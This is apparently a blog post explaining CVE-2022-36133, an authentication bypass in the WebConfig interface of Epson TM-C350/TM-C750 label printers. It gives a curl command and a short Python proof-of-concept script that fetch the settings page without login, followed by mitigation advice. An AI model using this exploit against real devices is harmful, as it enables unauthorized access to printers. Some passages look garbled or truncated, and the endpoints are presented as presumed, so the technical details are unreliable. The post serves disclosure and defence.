Printer security may not be the flashiest topic in cybersecurity, but the consequences of a vulnerable printer can be severe. One such case is CVE-2022-36133, a flaw discovered in Epson’s popular industrial color label printers—the TM-C350 and TM-C750—running firmware version WAM31500. This vulnerability allowed an attacker to bypass authentication in the device's WebConfig interface, potentially taking full control over the printer.
In this post, we'll break down what CVE-2022-36133 is all about, how the exploit works (including code snippets), and what you can do if your business relies on these devices.
What is CVE-2022-36133?
CVE-2022-36133 is an authentication bypass found in the WebConfig feature of Epson TM-C350 and TM-C750 printers. WebConfig is a web interface used by administrators to configure and monitor these printers. When these printers run the vulnerable WAM31500 firmware, an attacker can access the WebConfig interface—even if authentication is required—by using crafted requests.
This means anyone on the same network (and sometimes even on the internet, if the device is exposed) could access settings, read print jobs, or even change the printer’s configuration.
Why Does This Matter?
While it might seem like just another bug, printers often store sensitive data—including print logs, network passwords, and sometimes even credentials. A compromised printer can be a stepping stone for attackers to gain further access into a corporate network, set up persistent attacks, or simply cause massive disruption by changing printer settings.
Let’s see what the typical login flow looks like for the Epson TM-C350/TM-C750 WebConfig portal
GET /webconfig/
Host: [printer-ip]
This generally returns a login page. After you enter the username and password, the browser will POST them to an endpoint like /webconfig/login.cgi.
The Exploit: Authentication Bypass
CVE-2022-36133 exists because the WebConfig portal does not properly enforce authentication for certain endpoints. Specifically, it fails to require session cookies or tokens for settings pages, letting anyone simply visit URLs directly.
Suppose the WebConfig has a configuration page at
http://[printer-ip]/webconfig/settings.cgi
Even without logging in, an attacker can visit this URL and gain full access
curl http://[printer-ip]/webconfig/settings.cgi
The server responds with the settings page—no authentication required!
Below is a Python script that fetches the WebConfig settings page without credentials
import requests
# Set the IP of the target printer
printer_ip = '192.168.1.100'
# Target a settings page presumed to be protected
url = f'http://{printer_ip}/webconfig/settings.cgi';
response = requests.get(url)
if response.status_code == 200:
print("Exploit Successful! Settings page contents:")
print(response.text)
else:
print(f"Failed to access page. Status code: {response.status_code}")
When run against a vulnerable device, this script will dump the settings page contents—proving authentication can be bypassed.
Change Admin Credentials: Lock out legitimate administrators.
- Install Malicious Firmware: If firmware updates don’t require authentication, this could allow persistent compromise.
Mitigation Steps
- Update Firmware: Epson has reportedly patched this issue in a later firmware version. Visit Epson’s support page and search your model for firmware downloads.
- Network Segmentation: Ensure your printers are not directly accessible from untrusted networks or the internet.
Original CVE Listing:
Exploitalert Advisory:
Vendor Support Pages:
Final Thoughts
Printer security often goes overlooked, but as CVE-2022-36133 shows, even everyday workplace devices can pose a security risk. Always keep firmware up to date, never expose management interfaces to untrusted networks, and regularly audit your organization’s devices for vulnerabilities.
Stay safe, and don’t let your label printer be your weakest security link!
Timeline
Published on: 11/25/2022 06:15:00 UTC
Last modified on: 11/30/2022 20:49:00 UTC